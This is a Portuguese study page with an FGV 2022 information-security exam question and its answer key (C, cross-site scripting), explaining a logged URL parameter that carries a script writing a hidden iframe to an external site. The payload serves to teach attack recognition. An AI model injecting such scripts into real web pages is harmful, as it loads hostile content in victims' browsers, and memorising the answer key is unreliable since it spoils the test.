Questão nº 40

Questão de Segurança da Informação · FGV SEFAZ-MG 2022 - Tarde (nº 40)

FGV2022Auditor Fiscal - Tecnologia da InformaçãoSegurança da Informação
Gabarito: Cver comentário ↓

Considere o seguinte diagrama para responder às questões a seguir:

Vamos assumir que:

O cenário representa a rede da empresa hipotética XPTO.

Nem todos os dispositivos foram representados

Os dispositivos possuem as seguintes configurações:

Servidor A: IP: 10.77.8.10/20 – Função: Servidor de banco de dados SQL.

Servidor B: IP: 10.77.8.11/20 – Função: Servidor de aplicações http / https. – As aplicações utilizam os bancos de dados no Servidor A.

Firewall A: WAN IP: 73.12.78.44/24 IP: 10.77.0.1/20 – Funções – NGFW, Servidor de VPN, DHCP, DNS.

Computador 1: WAN IP: 200.255.10.22/24 VPN IP: 10.17.16.22/23.

Computador 2: IP: 10.77.1.16/20

Dispositivo móvel 1: WAN IP: 65.12.8.33/24 VPN IP: 10.17.17.26/23.

As pessoas A, B e C são funcionários da empresa XPTO.

O Servidor B possui aplicações corporativas que atendem a funcionários e clientes e estão publicadas na internet.

Figura da questão de Segurança da Informação


Durante uma análise de logs no Servidor B encontrou-se o seguinte registro:

https://www.minhaaplicacao.com.br/atualizacao?mensagem=<script>document.write("<iframe width='0' height='0' src='https://ssite.cn'></iframe>"</script>

Um exemplo da chamada comum para este registro seria:

https://www.minhaaplicacao.com.br/atualizacao?mensagem=Aviso de nova publicação

Identificou-se também que o campo mensagem é utilizado na composição do site e seu conteúdo aparece como parte do html dele.

A seguinte opção é consistente com um ataque que geraria um log deste tipo:

Resposta comentada

Gabarito Alternativa C

XSS (Cross-site Scripting) é um tipo de ataque onde um invasor injeta código malicioso (geralmente JavaScript) em páginas web visualizadas por outros usuários. Esse código é executado no navegador da vítima, permitindo ao atacante roubar dados, redirecionar o usuário ou realizar outras ações maliciosas.

(A) Incorreta: Distributed Denial of Service (DDoS) envolve sobrecarregar um servidor com um grande volume de tráfego, o que não é evidenciado por um único registro de URL com um script injetado.
(B) Incorreta: SQL Injection consiste em injetar comandos SQL em campos de entrada para manipular bancos de dados. O payload no log é um script HTML/JavaScript (`<script>...<iframe>...`) e não comandos SQL.
(C) Correta: O registro mostra uma tentativa de injeção de código JavaScript (`<script>...<iframe>...`) através do parâmetro `mensagem` da URL. Como o campo `mensagem` é refletido diretamente no HTML da página, o navegador da vítima executaria esse script, que neste caso tenta carregar um iframe de um site externo, caracterizando um ataque de Cross-site Scripting.
(D) Incorreta: Man in the Middle (MiTM) é um ataque onde o invasor intercepta a comunicação entre duas partes. O log representa uma requisição feita ao servidor, não uma interceptação da comunicação.
(E) Incorreta: Phishing é uma técnica de engenharia social para enganar usuários e obter informações confidenciais. Embora um ataque XSS possa ser uma ferramenta em uma campanha de phishing, o registro em si descreve a injeção do script malicioso, que é o ataque XSS, e não a tentativa de enganar o usuário.

Fonte: FGV SEFAZ-MG 2022 - Tarde Auditor Fiscal - Tecnologia da Informação (Caderno Tipo 1). Reproduzida para fins de estudo.

Continue estudando

Estudar é izi

Pratique milhares de questões como esta, de graça, com explicação e gamificação no Quizinho.

Estudar de graça no Quizinho